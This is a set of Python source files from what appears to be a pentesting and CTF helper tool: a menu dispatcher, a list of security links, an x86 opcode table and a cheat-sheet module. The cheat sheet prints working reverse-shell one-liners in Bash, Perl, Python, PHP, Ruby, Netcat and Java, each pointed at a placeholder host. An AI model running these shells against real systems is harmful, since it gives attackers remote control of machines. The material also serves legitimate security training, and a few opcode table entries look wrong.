191 | 'rot13_converter': rot13.convert,
192 | 'url_converter': url_coding.converting,
193 | 'html_converter': html.convert,
194 | 'useful_links': links.useful_links,
195 | 'opcodes': opcodes.list_opcodes,
196 | 'resources': list_resources,
197 | 'help': help_menu,
198 | 'modules': modules,
199 | 'clear': lambda: os.system('clear'),
200 | 'banner': banner,
201 | 'exit': lambda: exit(0),
202 | '': lambda: 1 + 1
203 | }
204 |
205 | if choice not in options:
206 | print colored('Unknown command: ' + choice, 'yellow')
207 |
208 | options.get(choice, lambda: None)()
209 | main()
210 |
211 |
212 | if __name__ == '__main__':
213 | check_root()
214 | banner()
215 |
216 | try:
217 | main()
218 | except KeyboardInterrupt:
219 | print ''
220 | print colored('Quitting', 'yellow')
221 | exit(0)
222 |
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/resources/__init__.py:
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1 |
2 |
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/resources/cheat_sheet.py:
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1 | #!/usr/bin/python
2 | """Pentest monkey Reverse shell cheat sheet."""
3 |
4 | from termcolor import colored
5 |
6 |
7 | def reverse_shells():
8 | """List reverse shells from pentest monkey."""
9 | print colored('Bash:', 'green')
10 | print colored('bash -i >& /dev/tcp/10.0.0.1/8080 0>&1', 'green')
11 | print ''
12 | print colored('Perl:', 'green')
13 | print colored(
14 | """perl -e 'use Socket;$i="10.0.0.1";"""
15 | """$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));"""
16 | """if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");"""
17 | """open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'""",
18 | 'green')
19 | print ''
20 | print colored('Python:', 'green')
21 | print colored(
22 | """python -c 'import socket,subprocess,os;"""
23 | """s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);"""
24 | """s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0);"""
25 | """os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);"""
26 | """p=subprocess.call(["/bin/sh","-i"]);'""", 'green')
27 | print ''
28 | print colored('PHP:', 'green')
29 | print colored(
30 | """php -r '$sock=fsockopen("10.0.0.1",1234);"""
31 | """exec("/bin/sh -i <&3 >&3 2>&3");'""", 'green')
32 | print ''
33 | print colored('Ruby:', 'green')
34 | print colored(
35 | """ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;"""
36 | r"""exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'""",
37 | 'green')
38 | print ''
39 | print colored('Netcat:', 'green')
40 | print colored('nc -e /bin/sh 10.0.0.1 1234', 'green')
41 | print colored(
42 | """rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh"""
43 | """ -i 2>&1|nc 10.0.0.1 1234 >/tmp/f""", 'green')
44 | print ''
45 | print colored('Java:', 'green')
46 | print colored(
47 | """r = Runtime.getRuntime()\n"""
48 | """p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;"""
49 | """cat <&5 | while read line; do \$line 2>&5"""
50 | """ >&5;done"] as String[])\n"""
51 | """p.waitFor()""", 'green')
52 | print ''
53 | print colored('Xterm:', 'green')
54 | print colored('xterm -display 10.0.0.1:1', 'green')
55 | print colored('Xnest :1', 'green')
56 | print colored('xhost +targetip', 'green')
57 |
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/resources/links.py:
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1 | #!/usr/bin/python
2 | """List useful links."""
3 |
4 | from termcolor import colored
5 |
6 |
7 | def useful_links():
8 | """List links."""
9 | print ''
10 | print colored('Self promotion', 'green')
11 | print colored('================================', 'green')
12 | print colored('https://github.com/3XPL017/', 'green')
13 | print colored('https://twitter.com/3XPL017GH057', 'green')
14 | print ''
15 | print colored('Blogs', 'green')
16 | print colored('================================', 'green')
17 | print colored('https://togetherwehack.com/', 'green')
18 | print colored('https://medium.com/pentestsec', 'green')
19 | print colored('https://medium.com/@0katz', 'green')
20 | print colored('http://pentestmonkey.net/', 'green')
21 | print colored('http://shell-storm.org/', 'green')
22 | print colored('https://infosecjon.com/', 'green')
23 | print ''
24 | print colored('Youtube channels', 'green')
25 | print colored('================================', 'green')
26 | print colored(
27 | '''LiveOverflow: '''
28 | '''https://www.youtube.com/channel/'''
29 | '''UClcE-kVhqyiHCcjYwcpfj9w''', 'green')
30 | print colored(
31 | '''GynvaelEN: '''
32 | '''https://www.youtube.com/channel/'''
33 | '''UCCkVMojdBWS-JtH7TliWkVg''', 'green')
34 | print colored(
35 | '''DemmSec: '''
36 | '''https://www.youtube.com/channel/'''
37 | '''UCJItQmwUrcW4VdUqWaRUNIg''', 'green')
38 | print colored(
39 | '''IppSec: '''
40 | '''https://www.youtube.com/channel/'''
41 | '''UCa6eh7gCkpPo5XXUDfygQQA''', 'green')
42 | print colored(
43 | '''sneakerhax: '''
44 | '''https://www.youtube.com/channel/'''
45 | '''UCyADXiqJNHwZmHnU9kjrypQ''', 'green')
46 | print colored(
47 | '''Derek Rook: '''
48 | '''https://www.youtube.com/channel/'''
49 | '''UCMACXuWd2w6_IEGog744UaA''', 'green')
50 | print colored(
51 | '''Murmus CTF: '''
52 | '''https://www.youtube.com/channel/'''
53 | '''UCUB9vOGEUpw7IKJRoR4PK-A''', 'green')
54 | print ''
55 | print colored('CTFs', 'green')
56 | print colored('================================', 'green')
57 | print colored('https://www.hackthebox.eu/en', 'green')
58 | print colored('https://www.root-me.org/?lang=en', 'green')
59 | print ''
60 | print colored('Misc', 'green')
61 | print colored('================================', 'green')
62 | print colored('https://censys.io/', 'green')
63 | print colored('https://www.talosintelligence.com/', 'green')
64 | print colored('https://quipqiup.com/', 'green')
65 |
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/resources/opcodes.py:
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1 | #!/usr/bin/python
2 | """Opcode table."""
3 |
4 | from termcolor import colored
5 |
6 |
7 | def list_opcodes():
8 | """List Opcodes."""
9 | print colored('x86 Opcodes', 'green')
10 | print colored(
11 | '''00 ADD 01 ADD 02 ADD 03 ADD 04 ADD'''
12 | ''' 05 ADD 06 PUSH 07 POP''', 'green')
13 | print colored(
14 | '''08 OR 09 OR 0A OR 0B OR 0C OR'''
15 | ''' 0D OR 0E PUSH 0F TWOBYTE''', 'green')
16 | print colored(
17 | '''10 ADC 11 ADC 12 ADC 13 ADC 14 ADC'''
18 | ''' 15 ADC 16 PUSH 17 POP''', 'green')
19 | print colored(
20 | '''18 SBB 19 SBB 1A SBB 1B SBB 1C SBB'''
21 | ''' 1D SBB 1E PUSH 1F POP''', 'green')
22 | print colored(
23 | '''20 AND 21 AND 22 AND 23 AND 24 AND'''
24 | ''' 25 AND 26 ES: 27 DAA''', 'green')
25 | print colored(
26 | '''28 SUB 29 SUB 2A SUB 2B SUB 2C SUB'''
27 | ''' 2D SUB 2E CS: 2F DAS''', 'green')
28 | print colored(
29 | '''30 XOR 31 XOR 32 XOR 33 XOR 34 XOR'''
30 | ''' 35 XOR 36 Ss: 37 AAA''', 'green')
31 | print colored(
32 | '''38 CMP 39 CMP 3A CMP 3B CMP 3C CMP'''
33 | ''' 3D CMP 3E DS: 3F AAS''', 'green')
34 | print colored(
35 | '''40 INC 41 INC 42 INC 43 INC 44 INC'''
36 | ''' 45 INC 46 INC 47 INC''', 'green')
37 | print colored(
38 | '''48 DEC 49 DEC 4A DEC 4B DEC 4C DEC'''
39 | ''' 4D DEC 4E DEC 4F DEC''', 'green')
40 | print colored(
41 | '''50 PUSH 51 PUSH 52 PUSH 53 PUSH 54 PUSH'''
42 | ''' 55 PUSH 56 PUSH 57 PUSH''', 'green')
43 | print colored(
44 | '''58 POP 59 POP 5A POP 5A POP 5B POP'''
45 | ''' 5C POP 5D POP 5E POP''', 'green')
46 | print colored(
47 | '''5F POP 60 PUSHA 61 POPA 62 BOUND 63 ARPL'''
48 | ''' 64 ES: 65 GS: 66 OPSIZE:''', 'green')
49 | print colored(
50 | '''68 PUSH 69 IMUL 6A PUSH 6B IMUL 6C INSB'''
51 | ''' 6D INSW 6E OUTSB 6F OUTSW''', 'green')
52 | print colored(
53 | '''70 JO 71 JNO 72 JB 73 JNB 74 JZ'''
54 | ''' 75 JNZ 76 JBE 77 JA''', 'green')
55 | print colored(
56 | '''78 JS 79 JNS 7A JP 7B JNP 7C JNP'''
57 | ''' 7D JNL 7E JLE 7F JNLE''', 'green')
58 | print colored(
59 | '''80 ADD 81 ADD 82 SUB 83 SUB 84 TEST'''
60 | ''' 85 TEST 86 XCHG 87 XCHG''', 'green')
61 | print colored(
62 | '''88 MOV 89 MOV 8A MOV 8B MOV 8C MOV'''
63 | ''' 8D LEA 8E MOV 8F POP''', 'green')
64 | print colored(
65 | '''90 NOP 91 XCHG 92 XCHG 93 XCHG 94 XCHG'''
66 | ''' 95 XCHG 96 XCHG 97 XCHG''', 'green')
67 | print colored(
68 | '''98 CBW 99 CWD 9A CALL 9B WAIT 9C PUSHF'''
69 | ''' 9D POPF 9E SAHF 9F LAHF''', 'green')
70 | print colored(
71 | '''A0 MOV A1 MOV A2 MOV A3 MOV A4 MOVSB'''
72 | ''' A5 MOVSW A6 CMPSB A7 CMPSW''', 'green')
73 | print colored(
74 | '''A8 TEST A9 TEST AA STOSB AB STOSW AC LODSB'''
75 | ''' AD LODSW AE SCASB AF SCASW''', 'green')
76 | print colored(
77 | '''B0 MOV B1 MOV B2 MOV B3 MOV B4 MOV'''
78 | ''' B5 MOV B6 MOV B7 MOV''', 'green')
79 | print colored(
80 | '''B8 MOV B9 MOV BA MOV BB MOV BC MOV'''
81 | ''' BD MOV BE MOV BF MOV''', 'green')
82 | print colored(
83 | '''C0 #2 C1 #2 C2 RETN C3 RETN C4 LES'''
84 | ''' C5 LDS C6 MOV C7 MOV''', 'green')
85 | print colored(
86 | '''C8 ENTER C9 LEAVE CA RETF CB RETF CC INT3'''
87 | ''' CD INT CE INTO CF IRET''', 'green')
88 | print colored(
89 | '''D0 #2 D1 #2 D2 #2 D3 #2 D4 AAM '''
90 | ''' D5 AAD D6 SALC D7 XLAT''', 'green')
91 | print colored(
92 | '''D8 ESC D9 ESC DA ESC DB ESC DC ESC'''
93 | ''' DD ESC DE ESC DF ESC''', 'green')
94 | print colored(
95 | '''E1 LOOPZ E2 LOOP E3 JCXZ E4 IN E5 IN'''
96 | ''' E6 OUT E7 OUT E8 CALL''', 'green')
97 | print colored(
98 | '''E9 JMP EA JMP EB JMP EC IN ED IN'''
99 | ''' EE OUT EF OUT F0 LOCK:''', 'green')
100 | print colored(
101 | '''F1 INT1 F2 REPNE F3 REP: F4 HLT F5 CMC'''
102 | ''' F6 #3 F7 #3 F8 CLC''', 'green')
103 | print colored(
104 | '''F9 STC FA CLI FB STI FC CLD FD STD'''
105 | ''' FE #4 FF #5''', 'green')
106 |
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